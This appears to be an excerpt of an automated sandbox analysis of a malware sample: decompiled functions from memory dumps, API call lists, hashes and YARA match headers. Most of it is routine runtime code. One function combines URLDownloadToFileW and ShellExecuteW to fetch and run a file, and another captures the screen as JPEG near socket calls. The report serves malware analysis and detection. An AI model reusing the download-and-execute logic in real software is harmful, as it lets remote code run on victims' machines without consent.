                    				signed int _t24;
                    				signed int* _t25;
                    				void* _t27;
                    
                    				_t9 = _a4;
                    				_t25 = 0x46b658 + _t9 * 4;
                    				_t24 =  *_t25;
                    				if(_t24 == 0) {
                    					_t22 =  *(0x458b78 + _t9 * 4);
                    					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                    					if(_t27 != 0) {
                    						L8:
                    						 *_t25 = _t27;
                    						if( *_t25 != 0) {
                    							FreeLibrary(_t27);
                    						}
                    						_t13 = _t27;
                    						L11:
                    						return _t13;
                    					}
                    					_t15 = GetLastError();
                    					if(_t15 != 0x57) {
                    						_t27 = 0;
                    					} else {
                    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                    						_t27 = _t15;
                    					}
                    					if(_t27 != 0) {
                    						goto L8;
                    					} else {
                    						 *_t25 = _t15 | 0xffffffff;
                    						_t13 = 0;
                    						goto L11;
                    					}
                    				}
                    				_t4 = _t24 + 1; // 0x46a00d
                    				asm("sbb eax, eax");
                    				return  ~_t4 & _t24;
                    			}

                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,105D2E48,?,00000000,00000000,00000000,?,105D3174,00000006,00454340), ref: 105D2ED3
                    • GetLastError.KERNEL32(?,105D2E48,?,00000000,00000000,00000000,?,105D3174,00000006,00454340,00459068,00459070,00000000,00000364,?,105D2C22), ref: 105D2EDF
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,105D2E48,?,00000000,00000000,00000000,?,105D3174,00000006,00454340,00459068,00459070,00000000), ref: 105D2EED
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
                    • Instruction ID: a13bb1a72b4dc3d56ca80d0b245e06be387fcd1e862af31acbddfd279ab9fdf6
                    • Opcode Fuzzy Hash: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
                    • Instruction Fuzzy Hash: 1B0171326067239BC7114B7DAC46A567FA8EB15AF6B110A21F905D7241DB20D9118BE4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0046C518,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue), ref: 00442065
                    • GetLastError.KERNEL32(?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000,00000364,?,00441DB4), ref: 00442071
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000), ref: 0044207F
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
                    • Instruction ID: 1f93bee859a7bc905b4f209078c92e3314857c5c8a056cdaea3c14562744cb27
                    • Opcode Fuzzy Hash: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
                    • Instruction Fuzzy Hash: EC01D432601723ABD7314E789D44A6777D8AF55BA2BA00632FB06D3241DB64D801C6E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,004136FE), ref: 00417A0D
                    • ReadFile.KERNEL32(00000000,00000000,00000000,004136FE,00000000,00000000,00000000,?,004136FE), ref: 00417A32
                    • CloseHandle.KERNEL32(00000000,004136FE), ref: 00417A40
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleReadSize
                    • String ID:
                    • API String ID: 3919263394-0
                    • Opcode ID: 42e664b68ac7724ba780c5c00098682f8beb43ab86657588be60b934e4d9d7db
                    • Instruction ID: 7ac9442b92b71a3b95e557c57f242bac25566de69d818a97a3fadf0226cee174
                    • Opcode Fuzzy Hash: 42e664b68ac7724ba780c5c00098682f8beb43ab86657588be60b934e4d9d7db
                    • Instruction Fuzzy Hash: 1801D670541218BFE7105F61AC89EFF777CDB45396F1001AAF805A3281D6748F019674
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E10595F89(void* __ecx, void* __edi, char _a4) {
                    				void* _t17;
                    				void* _t22;
                    				void* _t23;
                    
                    				_t22 = __ecx;
                    				if( *((char*)(__ecx + 0x50)) == 0) {
                    					return 0;
                    				}
                    				if(_a4 == 0) {
                    					_t24 = _t23 - 0x18;
                    					E10592EF2(_t17, _t23 - 0x18, 0x45f650);
                    					E10592EF2(_t17, _t24 - 0x18, 0x45f670);
                    					E105A7AEE(_t17, __edi);
                    				}
                    				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
                    				SetEvent( *(_t22 + 0x54));
                    				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
                    				CloseHandle( *(_t22 + 0x58));
                    				return 1;
                    			}
                    Instruction addresses (one per decompiled line, original column layout lost in extraction):
                    0x10595f8d 0x10595f93 0x00000000 0x10595ff1 0x10595f99 0x10595f9b 0x10595fa5 0x10595fb4
                    0x10595fb9 0x10595fbe 0x10595fd0 0x10595fd3 0x10595fde 0x10595fe7 0x00000000

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C138,?,10595B17,00000001,0046C138,10595AC4,00000000,00000000,00000000), ref: 10595FC7
                    • SetEvent.KERNEL32(?,?,10595B17,00000001,0046C138,10595AC4,00000000,00000000,00000000), ref: 10595FD3
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,10595B17,00000001,0046C138,10595AC4,00000000,00000000,00000000), ref: 10595FDE
                    • CloseHandle.KERNEL32(?,?,10595B17,00000001,0046C138,10595AC4,00000000,00000000,00000000), ref: 10595FE7
                      • Part of subcall function 105A7AEE: GetLocalTime.KERNEL32(00000000), ref: 105A7B08
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                    • String ID:
                    • API String ID: 2993684571-0
                    • Opcode ID: 14243e36c7ce333b7c6a390551ac247db8d93023064db34f7c36e6f1ee58e299
                    • Instruction ID: dfe5be14bc162600193827d61b5849e397aa6278b3027342138a9cae8f40158b
                    • Opcode Fuzzy Hash: 14243e36c7ce333b7c6a390551ac247db8d93023064db34f7c36e6f1ee58e299
                    • Instruction Fuzzy Hash: 5AF096725047507FDB002F74DC0EA7A7F9CEB023A6F500569FC42C29A1DBA1D9A497A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041768D
                    • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004176AF
                    • CloseHandle.KERNEL32(00000000), ref: 004176BA
                    • CloseHandle.KERNEL32(00000000), ref: 004176C2
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$FileModuleNameOpenProcess
                    • String ID:
                    • API String ID: 3706008839-0
                    • Opcode ID: 26b55f5a258af6edc2e09f8168abb4a95287f2a40d9827df7da255adfb7933c9
                    • Instruction ID: f8a04bcb30d388e69ca110f6c0d2bfbdbb8b62fcd9983a5c8f5887249ce98a8e
                    • Opcode Fuzzy Hash: 26b55f5a258af6edc2e09f8168abb4a95287f2a40d9827df7da255adfb7933c9
                    • Instruction Fuzzy Hash: 44F0E9312447156BD6205A585C09FAB367C8784B93F100177F908D5292EEA4D94246AE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00431D01
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00431D06
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00431D0B
                      • Part of subcall function 00435195: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004351A6
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00431D20
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    • Opcode ID: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
                    • Instruction ID: 27214f9afc0f91924c16f590125f67372317177f634fefb71269c805fcfa3a97
                    • Opcode Fuzzy Hash: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
                    • Instruction Fuzzy Hash: 53C04C08844581101CA07A7352033FE13545CAF38CFB030DFA8711B6279E0D240B557F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
                      • Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D
                    • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00414646
                    • SHCreateMemStream.SHLWAPI(00000000), ref: 0041469C
                      • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Create$Stream$Compatibleclosesocket
                    • String ID: image/jpeg
                    • API String ID: 3038386933-3785015651
                    • Opcode ID: 3157928d94f895fa7c0d31915b799c90f63e5896104200d7a1b167f31e524ab8
                    • Instruction ID: 76b108af669c3063bc8327b28f0eeeb389dcf0988f89de8eeeeaadbda1c1d6eb
                    • Opcode Fuzzy Hash: 3157928d94f895fa7c0d31915b799c90f63e5896104200d7a1b167f31e524ab8
                    • Instruction Fuzzy Hash: F8816D716083419BC324FB25C985AEFB3A4AFC5318F00493FB5969B1D1EF785945CB8A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E10596AF9(char* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                    				char _v28;
                    				char _v44;
                    				char _v60;
                    				char _v64;
                    				char _v68;
                    				char _v72;
                    				char _v76;
                    				char _v84;
                    				void* _v104;
                    				void* __ebx;
                    				void* __ebp;
                    				intOrPtr* _t33;
                    				void* _t50;
                    				signed char _t54;
                    				intOrPtr* _t57;
                    				void* _t59;
                    				void* _t71;
                    				void* _t73;
                    				void* _t78;
                    				intOrPtr* _t80;
                    				void* _t82;
                    				void* _t84;
                    				void* _t85;
                    				void* _t87;
                    				void* _t89;
                    				void* _t107;
                    				void* _t121;
                    				void* _t145;
                    				void* _t149;
                    				signed int _t156;
                    				void* _t159;
                    				void* _t160;
                    				void* _t161;
                    				void* _t163;
                    				void* _t167;
                    				void* _t168;
                    
                    				_t168 = __eflags;
                    				_t141 = __edx;
                    				_t33 = E10592E03( &_a8);
                    				_push(0xffffffff);
                    				_t89 = 4;
                    				_push(_t89);
                    				_push( &_v28);
                    				E10595114( &_a8);
                    				_t159 = (_t156 & 0xfffffff8) - 0x2c;
                    				E10592F5A(_t89, _t159, __edx, _t168, 0x46c238);
                    				_t160 = _t159 - 0x18;
                    				E10592F5A(_t89, _t160, __edx, _t168,  &_v44);
                    				E105A82E6( &_v84, _t141);
                    				_t161 = _t160 + 0x30;
                    				_t149 =  *_t33 - _t89;
                    				if(_t149 == 0) {
                    					_t145 = 0;
                    					E10592CB7( &_v64, _t141, __eflags, 0);
                    					__eflags = E105968DD(0x45f6dc);
                    					if(__eflags == 0) {
                    						E10592CB7( &_v68, 0x45f6dc, __eflags, 0);
                    						_t141 = 0x45f6fc;
                    						__eflags = E105968DD(0x45f6fc);
                    						if(__eflags == 0) {
                    							L23:
                    							E10592CE2( &_v64, _t141);
                    							E10592E35();
                    							E10592E35();
                    							return 0;
                    						}
                    						_v68 = 0;
                    						_t50 = E10592E03(E10592CB7( &_v64, 0x45f6fc, __eflags, _t89));
                    						_t141 =  &_v76;
                    						__eflags = E105A7F7F(_t50,  &_v76,  &_v68);
                    						if(__eflags == 0) {
                    							_t107 = _t161 - 0x18;
                    							_push(0x45f6e0);
                    							L22:
                    							E10592EF2(_t89, _t107);
                    							_push(0xb3);
                    							E10595912(_t89, _a4, _t141, __eflags);
                    							goto L23;
                    						}
                    						_t141 = _v72;
                    						_t54 = E105A5199(0x46bb08);
                    						L105CA35F(_v72);
                    						_t163 = _t161 - 0x18;
                    						__eflags = (_t54 & 0x000000ff) - 1;
                    						L9:
                    						_t107 = _t163;
                    						if(__eflags != 0) {
                    							_push(0x45f6f0);
                    						} else {
                    							_push(0x45f6f4);
                    						}
                    						goto L22;
                    					}
                    					_t57 = E10592E03(E10592CB7( &_v68, 0x45f6dc, __eflags, 2));
                    					_t59 = E10592E03(E10592CB7( &_v68, 0x45f6dc, __eflags, 3));
                    					_t141 =  *_t57;
                    					E105A8EC9( &_v60,  *_t57, _t59);
                    					__eflags =  *0x453468(0, E10592E03(E10592CB7( &_v72,  *_t57, __eflags, _t89)), E10592D59( &_v60), 0, 0);
                    					if(__eflags == 0) {
                    						L4:
                    						if( *((char*)(E10592E03(E10592CB7( &_v84, _t141, _t172, 1)))) == 0) {
                    							_t121 = _t161 - 0x18;
                    							_push(0x45f6f8);
                    						} else {
                    							_t71 = ShellExecuteW(_t145, 0x45f6e4, E10592D59( &_v72), _t145, _t145, 1);
                    							_t121 = _t161 - 0x18;
                    							_t174 = _t71 - 0x20;
                    							if(_t71 > 0x20) {
                    								_push(0x45f6f4);
                    							} else {
                    								_push(0x45f6f0);
                    							}
                    						}
                    						L17:
                    						E10592EF2(_t89, _t121);
                    						_push(0xb3);
                    						E10595912(_t89, _a4, _t141, _t174);
                    						E10592D5E();
                    						goto L23;
                    					}
                    					L14:
                    					_t121 = _t161 - 0x18;
                    					_push(0x45f6e0);
                    					goto L17;
                    				}
                    				_t170 = _t149 != 1;
                    				if(_t149 != 1) {
                    					goto L23;
                    				}
                    				_t145 = 0;
                    				E10592CB7( &_v64, _t141, _t170, 0);
                    				_t73 = E105968DD(0x45f6dc);
                    				_t171 = _t73;
                    				if(_t73 == 0) {
                    					E10592CB7( &_v68, 0x45f6dc, __eflags, 0);
                    					_t141 = 0x45f6fc;
                    					__eflags = E105968DD(0x45f6fc);
                    					if(__eflags == 0) {
                    						goto L23;
                    					} else {
                    						_t141 = E10592E03(E10592CB7( &_v64, 0x45f6fc, __eflags, _t89));
                    						_t78 = E105A5199(0x46bb08);
                    						_t163 = _t161 - 0x18;
                    						__eflags = _t78 - 1;
                    						goto L9;
                    					}
                    				}
                    				_t80 = E10592E03(E10592CB7( &_v68, 0x45f6dc, _t171, 2));
                    				_t82 = E10592E03(E10592CB7( &_v68, 0x45f6dc, _t171, 3));
                    				_t141 =  *_t80;
                    				E105A8EC9( &_v60,  *_t80, _t82);
                    				_t84 = E10592D59( &_v60);
                    				_t85 = E10592CB7( &_v72,  *_t80, _t171, _t89);
                    				_t167 = _t161 - 0x18;
                    				E10592F5A(_t89, _t167, _t141, _t171, _t85);
                    				_t87 = E105A88BC(_t84);
                    				_t161 = _t167 + 0x18;
                    				_t172 = _t87 - 1;
                    				if(_t87 != 1) {
                    					goto L14;
                    				}
                    				goto L4;
                    			}
                    Instruction addresses (one per decompiled line, original column layout lost in extraction):
                    0x10596af9 0x10596af9 0x10596b08 0x10596b0d 0x10596b11 0x10596b17 0x10596b1c 0x10596b1d
                    0x10596b22 0x10596b2c 0x10596b31 0x10596b3b 0x10596b44 0x10596b49 0x10596b4c 0x10596b4e
                    0x10596c83 0x10596c8a 0x10596c9f 0x10596ca1 0x10596d41 0x10596d46 0x10596d52 0x10596d54
                    0x10596dc2 0x10596dc6 0x10596dcf 0x10596dd7 0x10596de4 0x10596de4 0x10596d5a 0x10596d6b
                    0x10596d70 0x10596d7c 0x10596d7e 0x10596da9 0x10596dab 0x10596db0 0x10596db0 0x10596db8
                    0x10596dbd 0x00000000 0x10596dbd 0x10596d80 0x10596d89 0x10596d95 0x10596d9b 0x10596d9e
                    0x10596c6b 0x10596c6b 0x10596c6d 0x10596c79 0x10596c6f 0x10596c6f 0x10596c6f 0x00000000
                    0x10596c6d 0x10596cb0 0x10596cc4 0x10596cc9 0x10596cd0 0x10596cfb 0x10596cfd 0x10596be2
                    0x10596bf7 0x10596d19 0x10596d1b 0x10596bfd 0x10596c11 0x10596c1a 0x10596c1c 0x10596c1f
                    0x10596d0f 0x10596c25 0x10596c25 0x10596c25 0x10596c1f 0x10596d20 0x10596d20 0x10596d28
                    0x10596d2d 0x10596d36 0x00000000 0x10596d36 0x10596d03 0x10596d06 0x10596d08 0x00000000
                    0x10596d08 0x10596b54 0x10596b57 0x00000000 0x00000000 0x10596b5d 0x10596b64 0x10596b70
                    0x10596b79 0x10596b7b 0x10596c30 0x10596c35 0x10596c41 0x10596c43 0x00000000 0x10596c49
                    0x10596c5a 0x10596c61 0x10596c66 0x10596c69 0x00000000 0x10596c69 0x10596c43 0x10596b8a
                    0x10596b9e 0x10596ba3 0x10596baa 0x10596bb4 0x10596bc0 0x10596bc5 0x10596bcb 0x10596bd2
                    0x10596bd7 0x10596bda 0x10596bdc 0x00000000 0x00000000 0x00000000

                    APIs
                    • ShellExecuteW.SHELL32(00000000,0045F6E4,00000000,00000000,00000000,00000001), ref: 10596C11
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 10596CF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: DownloadExecuteFileShell
                    • String ID: C:\Windows\SysWOW64\DpiScaling.exe
                    • API String ID: 2825088817-2099798370
                    • Opcode ID: 453a47a43b9386e89b5fad37c1906368be786dd2ced269cf5789ff799b2fc22a
                    • Instruction ID: 308bede8af26b3ddf02af1816fe3853dbbc29537abbe5d7df23d39214263e9b2
                    • Opcode Fuzzy Hash: 453a47a43b9386e89b5fad37c1906368be786dd2ced269cf5789ff799b2fc22a
                    • Instruction Fuzzy Hash: BB61A97AA0430067CA04EB74886BE7E3F59DBD5690F50092DF855971D5EE24AE0EC3E3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 0044007D
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorHandling__start
                    • String ID: pow
                    • API String ID: 3213639722-2276729525
                    • Opcode ID: 470747d616ef13e46d520b9d6506e9ce1466c58b55dc60c101e84deed0b6941c
                    • Instruction ID: babdc6cb86f69e92a49f67b65813cd9987bd5c6d342bfcb4e84cdf9adaacb59d
                    • Opcode Fuzzy Hash: 470747d616ef13e46d520b9d6506e9ce1466c58b55dc60c101e84deed0b6941c
                    • Instruction Fuzzy Hash: E9517CA1A0A20196F7517B14E9C137B2B90DB50701F284D7FF585423E9EB3D8CA59A4F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00446F6C: GetOEMCP.KERNEL32(00000000,?,?,004471F5,?), ref: 00446F97
                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044723A,?,00000000), ref: 0044740D
                    • GetCPInfo.KERNEL32(00000000,:rD,?,?,?,0044723A,?,00000000), ref: 00447420
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CodeInfoPageValid
                    • String ID: :rD
                    • API String ID: 546120528-3120900009
                    • Opcode ID: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
                    • Instruction ID: 614f5d5ef064064d7ec38ea7b35d3f5f756231f868e2d753d05d5f6cbb9767d4
                    • Opcode Fuzzy Hash: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
                    • Instruction Fuzzy Hash: 65513370A086059EFB20CF35C8816BBBFA5EF41304F14406FD0868B251E73D9947CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: __alloca_probe_16__freea
                    • String ID: :nA
                    • API String ID: 1635606685-739806843
                    • Opcode ID: cd9779f19d5164756a7b6c9dd4ed2ebcf1146dd2ace0f223ff1ba358c0ba93f0
                    • Instruction ID: b2704c7f0d005af92b138ccac846c72b2bc5cf82682ae8b9dcaf7a2bd2d3a61c
                    • Opcode Fuzzy Hash: cd9779f19d5164756a7b6c9dd4ed2ebcf1146dd2ace0f223ff1ba358c0ba93f0
                    • Instruction Fuzzy Hash: 2E410671A01112FBDB20AF66CC42A6F77A0DF59724F15552BF804DB2C0EB7CD941879A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E105C0805(intOrPtr __edx, void* __eflags) {
                    				char _v16;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed char _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				intOrPtr _t56;
                    				signed int _t58;
                    				signed int _t62;
                    				intOrPtr _t64;
                    				signed int _t65;
                    				signed int _t67;
                    				intOrPtr _t72;
                    				intOrPtr _t73;
                    				intOrPtr* _t75;
                    				intOrPtr _t82;
                    				intOrPtr _t87;
                    				intOrPtr* _t89;
                    				signed int _t90;
                    
                    				_t87 = __edx;
                    				E105C07D0( &_v16);
                    				E105C2EC8( &_v16, 0x467cd4);
                    				asm("int3");
                    				 *0x46ad0c =  *0x46ad0c & 0x00000000;
                    				 *0x46a010 =  *0x46a010 | 1;
                    				if(IsProcessorFeaturePresent(0xa) == 0) {
                    					L20:
                    					return 0;
                    				}
                    				_v36 = _v36 & 0x00000000;
                    				 *0x46a010 =  *0x46a010 | 0x00000002;
                    				 *0x46ad0c = 1;
                    				_t89 =  &_v60;
                    				_push(1);
                    				asm("cpuid");
                    				_pop(_t72);
                    				 *_t89 = 0;
                    				 *((intOrPtr*)(_t89 + 4)) = 1;
                    				 *((intOrPtr*)(_t89 + 8)) = 0;
                    				 *((intOrPtr*)(_t89 + 0xc)) = _t87;
                    				_v28 = _v60;
                    				_t56 = 1;
                    				_t82 = 0;
                    				_push(1);
                    				asm("cpuid");
                    				_pop(_t73);
                    				 *_t89 = _t56;
                    				 *((intOrPtr*)(_t89 + 4)) = _t72;
                    				 *((intOrPtr*)(_t89 + 8)) = _t82;
                    				 *((intOrPtr*)(_t89 + 0xc)) = _t87;
                    				if((_v48 ^ 0x49656e69 | _v52 ^ 0x6c65746e | _v56 ^ 0x756e6547) != 0) {
                    					L9:
                    					_t90 =  *0x46ad10;
                    					L10:
                    					_v44 = _v48;
                    					_t58 = _v52;
                    					_v24 = _t58;
                    					_v40 = _t58;
                    					if(_v28 >= 7) {
                    						_t64 = 7;
                    						_push(_t73);
                    						asm("cpuid");
                    						_t75 =  &_v60;
                    						 *_t75 = _t64;
                    						 *((intOrPtr*)(_t75 + 4)) = _t73;
                    						 *((intOrPtr*)(_t75 + 8)) = 0;
                    						 *((intOrPtr*)(_t75 + 0xc)) = _t87;
                    						_t65 = _v56;
                    						_v36 = _t65;
                    						_t58 = _v24;
                    						if((_t65 & 0x00000200) != 0) {
                    							 *0x46ad10 = _t90 | 0x00000002;
                    						}
                    					}
                    					if((_t58 & 0x00100000) != 0) {
                    						 *0x46a010 =  *0x46a010 | 0x00000004;
                    						 *0x46ad0c = 2;
                    						if((_t58 & 0x08000000) != 0 && (_t58 & 0x10000000) != 0) {
                    							asm("xgetbv");
                    							_v32 = _t58;
                    							_v28 = _t87;
                    							if((_v32 & 0x00000006) == 6 && 0 == 0) {
                    								_t62 =  *0x46a010 | 0x00000008;
                    								 *0x46ad0c = 3;
                    								 *0x46a010 = _t62;
                    								if((_v36 & 0x00000020) != 0) {
                    									 *0x46ad0c = 5;
                    									 *0x46a010 = _t62 | 0x00000020;
                    								}
                    							}
                    						}
                    					}
                    					goto L20;
                    				}
                    				_t67 = _v60 & 0x0fff3ff0;
                    				if(_t67 == 0x106c0 || _t67 == 0x20660 || _t67 == 0x20670 || _t67 == 0x30650 || _t67 == 0x30660 || _t67 == 0x30670) {
                    					_t90 =  *0x46ad10 | 0x00000001;
                    					 *0x46ad10 = _t90;
                    					goto L10;
                    				} else {
                    					goto L9;
                    				}
                    			}
                    Instruction addresses (one per decompiled line, original column layout lost in extraction):
                    0x105c0805 0x105c080e 0x105c081c 0x105c0821 0x105c0825 0x105c0833 0x105c0842 0x105c09b5
                    0x105c09bb 0x105c09bb 0x105c0848 0x105c084e 0x105c0859 0x105c085f 0x105c0862 0x105c0863
                    0x105c0867 0x105c0868 0x105c086a 0x105c086d 0x105c0870 0x105c0879 0x105c0898 0x105c089b
                    0x105c089c 0x105c089d 0x105c08a1 0x105c08a2 0x105c08a4 0x105c08a7 0x105c08aa 0x105c08ad
                    0x105c08f2 0x105c08f2 0x105c08f8 0x105c08ff 0x105c0902 0x105c0905 0x105c0908 0x105c090b
                    0x105c090f 0x105c0912 0x105c0913 0x105c0918 0x105c091b 0x105c091d 0x105c0920 0x105c0923
                    0x105c0926 0x105c092e 0x105c0931 0x105c0934 0x105c0939 0x105c0939 0x105c0934 0x105c0946
                    0x105c0948 0x105c094f 0x105c095e 0x105c0969 0x105c096c 0x105c096f 0x105c0980 0x105c098b
                    0x105c098e 0x105c099c 0x105c09a1 0x105c09a6 0x105c09b0 0x105c09b0 0x105c09a1 0x105c0980
                    0x105c095e 0x00000000 0x105c0946 0x105c08b2 0x105c08bc 0x105c08e7 0x105c08ea 0x00000000
                    0x00000000 0x00000000 0x00000000

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 105C081C
                      • Part of subcall function 105C2EC8: RaiseException.KERNEL32(?,?,?,105C0804,?,?,?,?,?,?,?,?,105C0804,?,00467C9C), ref: 105C2F27
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 105C083B
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ExceptionException@8FeaturePresentProcessorRaiseThrow
                    • String ID:
                    • API String ID: 3513446524-3916222277
                    • Opcode ID: a94f6f5834c9504162b7eaa04ed3e0543e0de1ca1c047e1d4971b6c159cbcaa3
                    • Instruction ID: a3129a7cacb49e90969c228ff215194fd4efadeeb162f1c50629d1fabc319833
                    • Opcode Fuzzy Hash: a94f6f5834c9504162b7eaa04ed3e0543e0de1ca1c047e1d4971b6c159cbcaa3
                    • Instruction Fuzzy Hash: B151BE71D007099BEB14CFA5E98579EBFF8FB09350F10852AE415E7290E3B4A920CF92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00447069
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Info
                    • String ID: $vuD
                    • API String ID: 1807457897-1530330280
                    • Opcode ID: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
                    • Instruction ID: 92fcf1547ebdf66eb0b87621d9a8ff62090b57e6ee7fe94dbbcc2872a12e2c7f
                    • Opcode Fuzzy Hash: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
                    • Instruction Fuzzy Hash: 9641F9705082489FEF258E64CC84BF7BBB9DB55308F2404EEE58A87242D3399E46DF65
